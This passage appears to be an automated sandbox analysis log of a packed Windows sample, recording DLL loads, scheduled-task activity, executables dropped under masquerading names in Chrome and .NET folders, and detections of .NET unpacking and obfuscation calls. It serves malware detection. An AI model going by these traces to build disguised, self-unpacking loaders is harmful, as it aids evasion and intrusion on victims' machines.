            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: version.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: amsi.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: edputil.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: slc.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: sppc.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: C:\chainSurrogate\browsersvc.exeDirectory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exeJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeDirectory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\1b42ae2595212aJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exeJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\5940a34987c991Jump to behavior
            Source: DFpUKTL6kg.exeStatic file information: File size 1164929 > 1048576
            Source: DFpUKTL6kg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DFpUKTL6kg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DFpUKTL6kg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DFpUKTL6kg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DFpUKTL6kg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DFpUKTL6kg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DFpUKTL6kg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: DFpUKTL6kg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DFpUKTL6kg.exe
            Source: DFpUKTL6kg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DFpUKTL6kg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DFpUKTL6kg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DFpUKTL6kg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DFpUKTL6kg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, dMHUKffUPGQiwfC8LCj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, dMHUKffUPGQiwfC8LCj.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            .NET source code contains potential unpacker
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GJX08jxFEBcbTsRKlEy.cs.Net Code: mHlOFOdMrv System.AppDomain.Load(byte[])
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GJX08jxFEBcbTsRKlEy.cs.Net Code: mHlOFOdMrv System.Reflection.Assembly.Load(byte[])
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GJX08jxFEBcbTsRKlEy.cs.Net Code: mHlOFOdMrv
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GJX08jxFEBcbTsRKlEy.cs.Net Code: mHlOFOdMrv System.AppDomain.Load(byte[])
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GJX08jxFEBcbTsRKlEy.cs.Net Code: mHlOFOdMrv System.Reflection.Assembly.Load(byte[])
            Source: 0.3.DFpUKTL6kg.exe.686c533.0.raw.unpack, GJX08jxFEBcbTsRKlEy.cs.Net Code: mHlOFOdMrv
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeFile created: C:\chainSurrogate\__tmp_rar_sfx_access_check_3769812Jump to behavior
            Source: DFpUKTL6kg.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0E28C push eax; ret 0_2_00A0E2AA
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0ED46 push ecx; ret 0_2_00A0ED59
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeCode function: 35_2_00007FFD9BAC2F15 pushfd ; iretd 35_2_00007FFD9BAC2FE2
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeCode function: 35_2_00007FFD9BAD0B03 push E95D46FFh; ret 35_2_00007FFD9BAD0B19
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, kbELY8Z6rbtYcIBHYdx.csHigh entropy of concatenated method names: '_269', '_5E7', 'DEdoHrbvcU', 'Mz8', 'N5RoJ1wNrC', 'inFV4a5rxA9myp3fdX4', 'i6eaqk57sIaHgfu2ybF', 'KtxBaU5L369kPXFhRIm', 'RhyaDN5wrANZxe5ZlZ1', 'lsp3Wp5q7BoxyfbKXnA'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, AYeAY2DGAuY046KAvUS.csHigh entropy of concatenated method names: 'wikj558U6d', 'hXN0S84YDPTD1p1D8O2', 'zeRQyJ4w7bvEoXpFC2W', 'GLDqGg4qScZgf8cTnqB', 'vMuXw84tWm0Y82FDP3Q', 'fFS9i34S7PCBgfPQuaA', 'N0vVpN4zvojiY7uiitH'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, PSbbAuZ3lZjvnlgyjEW.csHigh entropy of concatenated method names: 'mEhaZhAM5J', 'X07a9nUVIc', 'cM5aVY6fiP', 'XvWa0Pk6rC', 'eZe0JCG2buH7BCQmYfu', 'XdaWcDGCgmPAUDc9HQi', 'vMDUF9GOlDdOcPm25Ea', 'BfRKryGiIpKVdKDSkRk', 'MpeyWMGBjKgEdaP9rI3', 'VC6akFG4Q7Z01vr2Zu5'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, en3bUidfCSXmE05EjLw.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'xy5lW5cw3BV0wHU2FeJ', 'pvgk02cqOBPCEWIPufu', 'kPgM8NcY8NZcvypUQur', 'JhYiIFctF0kf02tn9aT', 'eSIioxcSpATHSZwV2sR', 'JVs0hrczDp8kCqBC8MR'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, ApP5TTzE2emjICUHTs.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'beIF1McbpeoL34r3ckm', 'I9ejBQcDmmd9x9qI7yL', 'nDfhqlcxjvqUEwqZrUp', 'VvOZcRccO5mBFbMCiDL', 'kW2RNYcVm7ldhpDglgI', 'bNuo98cQvy2JaTxNpFG'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, TL926Ex3rQ57xjWu38H.csHigh entropy of concatenated method names: 'f8wOWgjqdc', 'zlZZPFKbSbBUHWsRhRE', 'KlEbh7KDN4NJW7kDkYa', 'shblDNKPQ01AHM2WBHB', 'NGIPvJKETCDRGIwjidH', 'jVx3sXKxjdA1PdH9QPR', 'jxtMaWKct8tRtRQnEWM', 'f5q1EtKVtZ5fbiflsIo', 'qPXaYJKQjc8GSnI2Zo4', 'u2BsxkKXsc2uObWfbDf'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, VwKuOwZO4QdsBRp2XKM.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'wFJp1t7oZG', 'zRMoPxgPdq', 'FZDpK6CxMV', 'gi1oNHbJAd', 'kG7bAb566SorBY4himj', 'I2DFj55oLP0XrKXMaim', 'gihF3d5OvuCH7PLAGvu'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, EEPp77xo7ILi3d5Snj2.csHigh entropy of concatenated method names: 'Vb5Oz8Vq6n', 'PoKR5HIdXA', 'FIbRbPwZlm', 'xu0RmeLdyh', 'yIVROrNhEn', 'FeWRRiLjnX', 'kHnRHoUHRA', 'FfmRla5Rf8', 'OB9R41GOog', 'T0nRaslgoM'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, HK2g72X5JB6Aithn45p.csHigh entropy of concatenated method names: 'kdY2UwoBoi', '_1kO', '_9v4', '_294', 'lmO2q0yRsN', 'euj', 'Mev2kxdMDY', 'E3e2jiJ3uF', 'o87', 'ty928bd20L'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, QIp5ggsoemj4C6RCGW4.csHigh entropy of concatenated method names: '_7zt', 'zJWAfMIKPd', 'i9AAIfKcRf', 'ABbAEpBB6X', 'qrBAcEaTkY', 'JmcAUHFt2m', 'TAUAqbKbbO', 'Of94kTynoDdSKZ6muXE', 'y09PfCy5DhFZq1Md8RM', 'lAQs8dyGbdR9Vnkq59v'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, fAFL9dmJcW03lmQF6M.csHigh entropy of concatenated method names: 'Qh7vwShTn', 'CDar013Iw', 'g7WtSRZLh', 'qVwOLFP626KE3x1Tl4N', 'N5oFgAPOi4AeWX7Kr5q', 'LUw34LP4ClXsUy55iVd', 'eVPBubPoAqFJySLuItE', 'mWagFFPINTmLRYBS4H7', 'aZMM6XPHvU1Cld8gg4R', 'hTLWkgPjouVP2XR2oV3'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, IA85i92kH4a3IoGErw.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'CvFGteEgdcfp4OSbmRd', 'Egt73SEvMxUGt7dfn36', 'AjrdmtE30f1erpuJIqy', 'fniNTPEFPWUdGrjOwFX', 'zVFVivEKvuNKPfpvCvy', 'Rg2JHuE92YJHPV1YLBV'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, xl9TQQDKRpUJYjs70fW.csHigh entropy of concatenated method names: 'MsAkymYrAp', 'm5WkYkqerE', 'SEPkXH5L5D', 'WTjriw4IcwVrqVp2Juu', 'urVAir46sCo6toiml7g', 'uH3nXO4oU6L9gThbX0f', 'HbOchL4HStIgSXykIBk', 'o0qWnI4jeP9dmQtvxf0', 'IFmd2H4A5SpmHTevJeu', 'aekgRW4ReR32NAoHqiP'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, GJX08jxFEBcbTsRKlEy.csHigh entropy of concatenated method names: 'KXlODhMyTx', 'tPROucks12', 'QbXOvrlmwu', 'VLIOrIqdXJ', 'tcEOtuE0vH', 'VP3OPJ2Y4f', 'LKROwokqx1', 'OCgsFWFJahHq5D7BxjW', 'grgG8fFn0B75G9ZVnWn', 'TWP1L9F5N6ZLG4PCo38'
            Source: 0.3.DFpUKTL6kg.exe.716d533.1.raw.unpack, pAkbYfZEpr9GVrHfYhW.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'BG5bxFnFO4MqlAtOZ3P', 'dSpHAonKh0RTSJu8QeX', 'gVjaJXn9MsAWAZCUOLi', 'CWShCynu477EA5x1ZmH'
